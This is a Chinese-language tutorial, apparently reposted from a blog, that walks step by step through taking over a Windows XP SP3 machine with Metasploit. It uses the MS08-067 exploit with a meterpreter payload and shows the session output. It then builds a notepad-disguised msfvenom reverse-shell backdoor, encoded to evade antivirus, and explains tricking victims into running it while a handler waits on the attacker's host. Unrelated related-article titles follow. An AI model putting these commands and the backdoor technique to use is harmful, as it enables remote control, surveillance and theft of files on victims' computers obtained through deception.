我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。

本文演示怎么使用Metasploit入侵windows xp sp3。

启动msfconsole:

# msfconsole

选择一个漏洞:

msf > search platform: windows xp sp3

exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。

查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:

msf > info exploit/windows/smb/ms08_067_netapi

依次执行如下命令:

msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108  (设置目标主机IP地址)
> exploit

如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32meterpreter >

现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。

演示使用后门程序侵入Windows

原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。

生成后门程序:

我把后门程序隐藏到记事本程序中:notepad.exe

查看Kali Linux的IP:ifconfig(192.168.0.112)

创建后门程序,my_backdoor.exe:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe

上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。

把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。

启动msfconsole:

# msfconsole

use exploit/multi/handlerset LHOST 192.168.0.112
set LPORT 4445
set payload windows/meterpreter/reverse_tcp
show options
exploit

等待受害者启动后门程序。

OK,入侵成功。

转载于:https://www.cnblogs.com/daoyi/p/yan-shi-shi-yongMetasploit-ru-qinWindows.html

演示使用Metasploit入侵Windows相关推荐

  1. Metasploit入侵win7

    文章目录 一.Metasploit是什么? 1.Auxiliaries(辅助模块) 2.Exploit(渗透攻击模块) 3.payload(攻击载荷模块) 4.Post(后期渗透模块) 5.Encod ...

  2. kali入侵windows

    因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门. ####实验环境 ![实验环境.jpg](h ...

  3. Metasploit入侵win7系统

    Metasploit入侵win7系统 一:实验环境 二:获得信息 a.获得网络拓扑图 b.获得主机ip和目标ip 三:实施入侵 a.打开控制终端 b.查找漏洞 c.进行配置 四:对主机进行操作 五:做 ...

  4. Kali社会工程学套件入侵Windows

    通过Kali系统自带的社会工程学套件制作基于Windows系统的恶意感染设备(SET.MSF.INF文件利用) MSFconsole一款不错的入侵渗透环境可以通过制作木马或者是漏洞利用去入侵计算机系统 ...

  5. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

  6. 使用Metasploit对Windows系统渗透测试——加壳免杀花指令

    文章目录 前言 一.准备工作 1.生成被控端攻击载荷 2.生成主控端handler 二.获取win xp的shell 三.获取win 7的shell 四.获取win 10的shell 1.免杀+捆绑 ...

  7. metasploit解决windows靶机乱码问题

    当metasploit获取windows权限之后发现乱码 chcp 65001 例: 解决方法:

  8. kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机

    metasploit入侵安卓手机拿shell KALI IP: 192.168.194.128 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp ...

  9. 入侵Windows服务器的流程

    一般情况下,黑客往往喜欢通过文章的上所示的流程图对Windows服务器进行攻击,从而提高入侵服务器的效率. ·通过端口139进入共享磁盘.139端口是为"NetBIOS Session Se ...

  10. 使用kail中Metasploit获取Windows的权限并提权

    0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.1 ...

最新文章

  1. 哈佛新研究登上Science封面:这个机械外骨骼,是一条“轻功”短裤
  2. Linux shell编程学习笔记-----第十四章
  3. 1.1 计算机视觉-深度学习第四课《卷积神经网络》-Stanford吴恩达教授
  4. PowerDesigner如何将物理模型转为对象模型,将对象模型转生成Java类
  5. 双数组 实现 Trie
  6. python 验证模型_Python中的模型验证
  7. NOIP2016洛谷P1600:天天爱跑步
  8. SELinux深入理解
  9. ztree 实例地址
  10. 《游戏之旅-我的编程感悟》读书笔记
  11. Mysql简单的存储过程怎么写
  12. jvm调优工具_高级程序员必会的5个JVM性能监控、调优工具使用详解
  13. 手机怎么更改ip地址
  14. xlsread错误使用matlab,运行显示错误使用xlsread,未找到文件
  15. 【Python】二分法求函数零点
  16. python求n的阶乘_python如何计算n的阶乘
  17. 类的继承——cancas绘制五彩小球
  18. 第4章 数据库应用系统功能设计与实施
  19. 计算机打印机共享服务怎么开,windows7系统打印机共享怎么设置?windows7系统打印机共享设置步骤...
  20. 【android studio】 the logging tag can be at most 23 characters

热门文章

  1. 什么舱位_飞机的舱位究竟是怎么一回事儿
  2. Latex:使用时遇到的一些问题解决
  3. 电脑蓝牙在哪里打开_华为手机与华为Matebook笔记本如何通过蓝牙传输文件
  4. vue中input多选_vue.js动态添加删除文本框input、下拉框select、单选radio、多选checkbox的方案。...
  5. C++“”字符与字符“”相加是连接
  6. Python 核心编程 (全)
  7. 使用tuned/tuned-adm工具动态调优你的CentOS系统
  8. 本地Exchange和exchange online混合部署后OWA统一登录的实现
  9. curl 同时发送多个请求
  10. 文本框中呈现文字,用鼠标点击一下消失